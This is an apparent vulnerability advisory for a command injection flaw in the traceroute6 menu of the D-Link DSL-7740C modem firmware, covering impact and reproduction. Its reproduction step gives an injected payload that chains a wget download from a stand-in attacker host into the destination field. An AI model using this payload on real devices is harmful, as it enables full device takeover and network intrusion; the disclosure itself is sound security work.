D-Link DSL-7740C Command Injection Vulnerability in Traceroute6 Function

A command injection vulnerability has been identified in the D-Link DSL-7740C modem, specifically in the firmware version DSL7740C.V6.TR069.20211230. The vulnerability exists within the traceroute6 function, accessed via SSH or Telnet with administrative credentials. Exploitation allows for arbitrary command execution on the device.

Impact

Exploitation of this vulnerability leads to complete compromise of the device, allowing attackers to execute arbitrary commands with elevated privileges. This could disrupt service, alter device configurations, intercept or manipulate network traffic, and potentially breach the network perimeter to access sensitive areas.

Reproduction

The vulnerability can be reproduced by accessing the device via SSH or Telnet with administrative credentials. Navigate to the '19. Ping and Traceroute6 Test' menu option and select '03 Run Traceroute6 Test.' Input a specially crafted payload as the destination, such as '1 || wget http://ATTACKER_HOST/test_t6 -O /tmp/t6 #'. This will trigger the command injection, leading to arbitrary code execution on the device.